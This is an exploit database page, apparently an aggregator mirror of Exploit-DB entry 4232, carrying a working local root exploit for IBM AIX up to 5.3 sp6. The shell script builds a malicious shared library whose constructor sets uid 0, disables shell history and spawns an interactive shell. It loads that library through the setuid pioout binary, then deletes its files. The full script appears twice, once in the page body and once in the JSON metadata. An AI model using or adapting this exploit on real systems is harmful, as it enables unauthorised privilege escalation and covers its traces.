Search...

IBM AIX <= 5.3 sp6 pioout Arbitrary Library Loading Local Root Exploit

2007-07-27T00:00:00

ID EDB-ID:4232
Type exploitdb
Reporter qaaz
Modified 2007-07-27T00:00:00

Description

IBM AIX <= 5.3 sp6 pioout Arbitrary Library Loading Local Root Exploit. Local exploit for aix platform

                                        
                                            #!/bin/sh
#
# 07/2007: public release
# IBM AIX &lt;= 5.3 sp6
#
echo "-------------------------------"
echo " AIX pioout Local Root Exploit "
echo " By qaaz"
echo "-------------------------------"
cat &gt;piolib.c &lt;&lt;_EOF_
#include &lt;stdlib.h&gt;
#include &lt;unistd.h&gt;
void init() __attribute__ ((constructor));
void init()
{
	seteuid(0);
	setuid(0);
	putenv("HISTFILE=/dev/null");
	execl("/bin/bash", "bash", "-i", (void *) 0);
	execl("/bin/sh", "sh", "-i", (void *) 0);
	perror("execl");
	exit(1);
}
_EOF_
gcc piolib.c -o piolib -shared -fPIC
[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib
rm -f piolib.c piolib

# milw0rm.com [2007-07-27]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:4232", "hash": "e745c90de7cb112a6da3e153b88ff704", "type": "exploitdb", "bulletinFamily": "exploit", "title": "IBM AIX <= 5.3 sp6 pioout Arbitrary Library Loading Local Root Exploit", "description": "IBM AIX <= 5.3 sp6 pioout Arbitrary Library Loading Local Root Exploit. Local exploit for aix platform", "published": "2007-07-27T00:00:00", "modified": "2007-07-27T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/4232/", "reporter": "qaaz", "references": [], "cvelist": [], "lastseen": "2016-01-31T20:26:27", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "dependencies": {"references": [], "modified": "2016-01-31T20:26:27"}, "vulnersScore": 7.2}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/4232/", "sourceData": "#!/bin/sh\n#\n# 07/2007: public release\n# IBM AIX <= 5.3 sp6\n#\necho \"-------------------------------\"\necho \" AIX pioout Local Root Exploit \"\necho \" By qaaz\"\necho \"-------------------------------\"\ncat >piolib.c <<_EOF_\n#include <stdlib.h>\n#include <unistd.h>\nvoid init() __attribute__ ((constructor));\nvoid init()\n{\n\tseteuid(0);\n\tsetuid(0);\n\tputenv(\"HISTFILE=/dev/null\");\n\texecl(\"/bin/bash\", \"bash\", \"-i\", (void *) 0);\n\texecl(\"/bin/sh\", \"sh\", \"-i\", (void *) 0);\n\tperror(\"execl\");\n\texit(1);\n}\n_EOF_\ngcc piolib.c -o piolib -shared -fPIC\n[ -r piolib ] && /usr/lpd/pio/etc/pioout -R ./piolib\nrm -f piolib.c piolib\n\n# milw0rm.com [2007-07-27]\n", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

IBM AIX &lt;= 5.3 sp6 pioout Arbitrary Library Loading Local Root Exploit

Description

IBM AIX <= 5.3 sp6 pioout Arbitrary Library Loading Local Root Exploit. Local exploit for aix platform

IBM AIX <= 5.3 sp6 pioout Arbitrary Library Loading Local Root Exploit